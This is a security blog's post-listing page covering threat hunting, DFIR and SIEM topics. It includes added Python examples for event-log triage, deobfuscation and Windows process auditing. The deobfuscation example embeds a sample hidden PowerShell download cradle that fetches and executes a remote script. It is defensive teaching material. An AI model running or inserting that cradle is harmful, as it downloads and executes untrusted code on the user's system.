Security You Can Trust, Expertise You Can Rely On. TekGenX Consulting
NetwerkLABS


Intrusion Detection and Response (page 2)
Threat Intelligence with MISP: Part 1 – Setting up MISP with Docker
Posted in: Threat Hunting, Threat Intelligence, SOC Analyst

Step-by-Step Guide to Install MISP Using Docker on Ubuntu
In this guide, we will walk through the steps to install the MISP (Malware Information Sharing Platform) using Docker on an…
Posted by Bharath Narayanasamy
Useful Windows Event IDs
Posted in: Threat Hunting, Threat Detection and Incident Response, Understanding Log Sources

Windows System Logs
Event ID 1074 (System Shutdown/Restart): This event log indicates when and why the system was shut down or restarted. By monitoring these events, you can determine if there…
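The monitoring idea behind Event ID 1074 can be turned into a small triage rule: who initiated the shutdown, from which image, at what time, and with which reason code. The script below is an added example, not code from the post; the three event records are constructed in the shape of 1074 EventData, and the allow-list of expected initiating processes and the 02:00-04:00 maintenance window are assumptions chosen for illustration.

```python
"""Triage Windows Event ID 1074 (system shutdown/restart) records.

Added example, not code from the original post. The three event records below
are constructed to carry the fields a 1074 event exposes (initiating process,
user, shutdown type, reason). The allow-list of expected initiating processes
and the 02:00-04:00 maintenance window are assumptions for illustration.
"""
from datetime import datetime, time

# Processes that normally initiate a shutdown/restart on a managed host (assumption).
EXPECTED_PROCESSES = {"wininit.exe", "shutdown.exe", "explorer.exe", "msiexec.exe", "ccmexec.exe"}

# Approved restart window, local time (assumption).
WINDOW_START, WINDOW_END = time(2, 0), time(4, 0)

# Constructed sample events in the shape of 1074 EventData pulled from an EVTX export.
SAMPLE_EVENTS = [
    {"time": "2025-03-01T03:10:00", "host": "WS01",
     "process": "C:\\Windows\\system32\\wininit.exe", "user": "NT AUTHORITY\\SYSTEM",
     "type": "restart", "reason": "Operating System: Upgrade (Planned)"},
    {"time": "2025-03-01T14:22:13", "host": "WS01",
     "process": "C:\\Windows\\system32\\shutdown.exe", "user": "CORP\\jdoe",
     "type": "restart", "reason": "No title for this reason could be found"},
    {"time": "2025-03-01T23:41:05", "host": "SRV02",
     "process": "C:\\Users\\Public\\update.exe", "user": "CORP\\svc_backup",
     "type": "power off", "reason": "Other (Unplanned)"},
]


def image_name(path):
    """Lower-cased file name of the initiating process."""
    return path.rsplit("\\", 1)[-1].lower()


def in_window(timestamp):
    """True if the event time falls inside the approved maintenance window."""
    t = datetime.fromisoformat(timestamp).time()
    return WINDOW_START <= t <= WINDOW_END


def triage(event):
    """Return the list of findings for one 1074 event (empty list means benign)."""
    findings = []
    proc = image_name(event["process"])
    if proc not in EXPECTED_PROCESSES:
        findings.append(f"unexpected initiating process: {proc}")
    if not in_window(event["time"]):
        findings.append("outside maintenance window")
    if "unplanned" in event["reason"].lower():
        findings.append("unplanned reason code")
    return findings


def triage_all(events):
    """Map (host, time) to findings for every event that raised at least one."""
    return {(e["host"], e["time"]): triage(e) for e in events if triage(e)}


if __name__ == "__main__":
    for key, findings in triage_all(SAMPLE_EVENTS).items():
        print(key, "->", "; ".join(findings))
```

The wininit.exe restart inside the window produces no findings; the user-initiated shutdown.exe at 14:22 is flagged only for timing, which an analyst can close quickly; the power-off from a binary in C:\Users\Public trips all three checks and is the one worth pulling the surrounding 4688/4624 events for.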
Code Obfuscation and Deobfuscation
Posted in: Threat Detection and Incident Response, Intrusion Detection and Response

Code obfuscation is a technique used to make a script more difficult for humans to read while leaving its behaviour unchanged from a technical point of view, though…
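Because obfuscation preserves behaviour, deobfuscation is mostly a matter of recognising each encoding layer and peeling it until readable code remains. The script below is an added example, not code from the post: it stacks four common layers (reversal, base64, hex, character codes) on a constructed download-cradle command, then peels them back with per-layer detectors. The keyword list used to decide that a reversed string is "more readable" is an assumption for illustration.

```python
"""Peel stacked string-obfuscation layers (char codes, hex, base64, reversal).

Added example, not code from the original post. The obfuscator, the layer order
and the sample command are constructed so the deobfuscator has something to
work on; the keyword list used to recognise a reversed payload is an assumption.
"""
import base64
import binascii
import re
import string

PRINTABLE = set(string.printable)
KEYWORDS = ("http", "powershell", "iex", "invoke", "cmd", "eval", "wget", "curl")


# --- obfuscation side (how a dropper might stack layers) -----------------
def obfuscate(text, layers):
    """Apply layers in order; the last applied layer is the outermost."""
    for layer in layers:
        if layer == "base64":
            text = base64.b64encode(text.encode()).decode()
        elif layer == "hex":
            text = text.encode().hex()
        elif layer == "reverse":
            text = text[::-1]
        elif layer == "charcodes":
            text = ",".join(str(ord(c)) for c in text)
        else:
            raise ValueError(f"unknown layer {layer}")
    return text


# --- deobfuscation side ----------------------------------------------------
def _is_text(s):
    return bool(s) and all(c in PRINTABLE for c in s)


def _score(s):
    """Count of suspicious keywords; higher means more likely readable code."""
    low = s.lower()
    return sum(low.count(k) for k in KEYWORDS)


def _try_charcodes(s):
    if not re.fullmatch(r"\s*\d{1,3}(\s*,\s*\d{1,3})*\s*", s):
        return None
    out = "".join(chr(int(n)) for n in s.split(","))
    return out if _is_text(out) else None


def _try_hex(s):
    if len(s) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", s):
        return None
    try:
        out = bytes.fromhex(s).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return out if _is_text(out) else None


def _try_base64(s):
    try:
        out = base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return out if _is_text(out) else None


def _try_reverse(s):
    # Only accept the reversal if it makes the string look more like code.
    r = s[::-1]
    return r if _score(r) > _score(s) else None


DECODERS = [("charcodes", _try_charcodes), ("hex", _try_hex),
            ("base64", _try_base64), ("reverse", _try_reverse)]


def deobfuscate(text, max_layers=16):
    """Peel layers until no decoder applies; returns (plaintext, layers peeled)."""
    peeled = []
    for _ in range(max_layers):
        for name, decoder in DECODERS:
            out = decoder(text)
            if out is not None and out != text:
                peeled.append(name)
                text = out
                break
        else:
            break
    return text, peeled


# Constructed sample: a download cradle wrapped in four layers (outermost last).
PAYLOAD = "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')\""
LAYERS = ["reverse", "base64", "hex", "charcodes"]

if __name__ == "__main__":
    blob = obfuscate(PAYLOAD, LAYERS)
    print(deobfuscate(blob))
```

The peeled-layer list comes back in the reverse of the order the obfuscator applied them, which is the trail an analyst records in the report; the `max_layers` cap stops a crafted input from keeping the loop busy, and every decoder insists on printable output so a wrong guess (a hex-looking base64 string, say) is rejected instead of corrupting the chain.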
Incident Response
Posted in: VulnLAB, Threat Detection and Incident Response, Intrusion Detection and Response

Incident response, also known as incident handling, is a cyber security function that uses various methodologies, tools and techniques to detect and manage adversarial attacks while minimizing impact, recovery time…
DFIR: Core Windows Processes
Posted in: Intrusion Detection and Response, RESPOND

Reference: TryHackMe Room "Core Windows Processes"
Core Windows Processes
As a defender, understanding how the Windows operating system functions is vital. Task Manager doesn't show a Parent-Child process view. That…
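The point of knowing the core processes is being able to check a live process list against their expected parent, image path and instance count without a tree view. The script below is an added example, not code from the post or the TryHackMe room: it encodes the well-known relationships (smss.exe under System, services.exe and lsass.exe under wininit.exe, svchost.exe under services.exe with a `-k` group, explorer.exe under an exited userinit.exe) and runs them over a constructed process snapshot with two planted anomalies. PIDs, users and the anomalies are invented.

```python
"""Audit a process snapshot against the expected parent/child relationships
of core Windows processes.

Added example, not code from the original post or the TryHackMe room. The
snapshot below is constructed (the shape of a tasklist/Sysmon export); the
PIDs and the two planted anomalies are invented.
"""
from collections import Counter

SYSTEM32 = "c:\\windows\\system32"

# Expected parent and image directory per core process. parent_exits=True marks
# relationships where the creating process normally exits, so a missing parent
# PID is not by itself suspicious.
EXPECTED = {
    "smss.exe":     {"parent": "system",       "dir": SYSTEM32,       "parent_exits": False},
    "csrss.exe":    {"parent": "smss.exe",     "dir": SYSTEM32,       "parent_exits": True},
    "wininit.exe":  {"parent": "smss.exe",     "dir": SYSTEM32,       "parent_exits": True},
    "winlogon.exe": {"parent": "smss.exe",     "dir": SYSTEM32,       "parent_exits": True},
    "services.exe": {"parent": "wininit.exe",  "dir": SYSTEM32,       "parent_exits": False},
    "lsass.exe":    {"parent": "wininit.exe",  "dir": SYSTEM32,       "parent_exits": False},
    "svchost.exe":  {"parent": "services.exe", "dir": SYSTEM32,       "parent_exits": False},
    "explorer.exe": {"parent": "userinit.exe", "dir": "c:\\windows",  "parent_exits": True},
}
# Processes that should run exactly once on a healthy host.
SINGLETONS = {"wininit.exe", "services.exe", "lsass.exe"}

# Constructed snapshot: the first eight rows are a normal boot chain,
# the last two are planted anomalies.
SAMPLE = [
    {"pid": 4,    "ppid": 0,    "name": "System",       "path": "",                                    "cmdline": ""},
    {"pid": 400,  "ppid": 4,    "name": "smss.exe",     "path": "C:\\Windows\\System32\\smss.exe",     "cmdline": "\\SystemRoot\\System32\\smss.exe"},
    {"pid": 500,  "ppid": 392,  "name": "csrss.exe",    "path": "C:\\Windows\\System32\\csrss.exe",    "cmdline": "csrss.exe ObjectDirectory=\\Windows"},
    {"pid": 560,  "ppid": 392,  "name": "wininit.exe",  "path": "C:\\Windows\\System32\\wininit.exe",  "cmdline": "wininit.exe"},
    {"pid": 620,  "ppid": 560,  "name": "services.exe", "path": "C:\\Windows\\System32\\services.exe", "cmdline": "services.exe"},
    {"pid": 640,  "ppid": 560,  "name": "lsass.exe",    "path": "C:\\Windows\\System32\\lsass.exe",    "cmdline": "lsass.exe"},
    {"pid": 760,  "ppid": 620,  "name": "svchost.exe",  "path": "C:\\Windows\\System32\\svchost.exe",  "cmdline": "svchost.exe -k netsvcs -p"},
    {"pid": 2100, "ppid": 2080, "name": "explorer.exe", "path": "C:\\Windows\\explorer.exe",           "cmdline": "explorer.exe"},
    {"pid": 3300, "ppid": 2100, "name": "svchost.exe",  "path": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\svchost.exe", "cmdline": "svchost.exe"},
    {"pid": 3400, "ppid": 2100, "name": "lsass.exe",    "path": "C:\\Users\\Public\\lsass.exe",        "cmdline": "lsass.exe"},
]


def check_process(proc, by_pid):
    """Findings for one process (empty list means it matches the baseline)."""
    name = proc["name"].lower()
    rule = EXPECTED.get(name)
    if rule is None:
        return []
    findings = []
    image_dir = proc["path"].rsplit("\\", 1)[0].lower() if "\\" in proc["path"] else ""
    if image_dir != rule["dir"]:
        findings.append(f"unexpected image path {proc['path']}")
    parent = by_pid.get(proc["ppid"])
    if parent is None:
        if not rule["parent_exits"]:
            findings.append(f"parent pid {proc['ppid']} not found (expected {rule['parent']})")
    elif parent["name"].lower() != rule["parent"]:
        findings.append(f"parent is {parent['name']} (expected {rule['parent']})")
    if name == "svchost.exe" and "-k" not in proc["cmdline"].split():
        findings.append("svchost.exe without -k service group")
    return findings


def audit(processes):
    """Return (findings keyed by pid, singleton processes seen more than once)."""
    by_pid = {p["pid"]: p for p in processes}
    per_process = {}
    for p in processes:
        findings = check_process(p, by_pid)
        if findings:
            per_process[p["pid"]] = findings
    counts = Counter(p["name"].lower() for p in processes)
    extra = {n: c for n, c in counts.items() if n in SINGLETONS and c > 1}
    return per_process, extra


if __name__ == "__main__":
    flagged, extra = audit(SAMPLE)
    for pid, findings in flagged.items():
        print(pid, "->", "; ".join(findings))
    print("singleton violations:", extra)
```

Only the two planted rows are flagged: the svchost.exe under explorer.exe running from a Temp folder with no `-k` group, and the second lsass.exe from C:\Users\Public; csrss.exe, wininit.exe and explorer.exe with missing parents pass because those parents are expected to have exited. The singleton count is reported separately so the analyst sees that lsass.exe exists twice and then uses the per-process findings to pick out which instance is the impostor.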
DFIR: Linux File System Analysis
Posted in: Threat Detection and Incident Response, Intrusion Detection and Response, DETECT
Splunk SPL 101
Posted in: Splunk
Practical Threat Hunting using Elastic SIEM: Hunting for Stuxbot
Posted in: Elastic SIEM, Threat Hunting, Threat Detection and Incident Response

Based on the INTRODUCTION TO THREAT HUNTING & HUNTING WITH ELASTIC module from HTB-Academy
Hunting for Stuxbot
The Stuxbot cybercrime group operates with a broad scope, seizing upon opportunities as…
Elastic SIEM: Developing Dashboards & Visualization
Posted in: DETECT, Elastic SIEM

  • Use case 1: Failed Logon Attempts (Disabled Users) https://youtu.be/7Uyqek-FdwI
  • Use case 2: Failed Logon Attempts (using Admin Accounts) https://youtu.be/UGRmsoqk0EM
  • Use case 3: Successful RDP Logon Related To Service Accounts https://youtu.be/eRjA6TpEryk
…
SIEM Use cases
Posted in: Elastic SIEM, BLUE TEAM, DETECT

How To Build SIEM Use Cases
Understand your needs and risks, and establish alerts to monitor all necessary systems accordingly. Determine the priority and impact, then map the alert to the…

Copyright 2025 — NetwerkLABS. Powered by TekGenX Consulting. All rights reserved.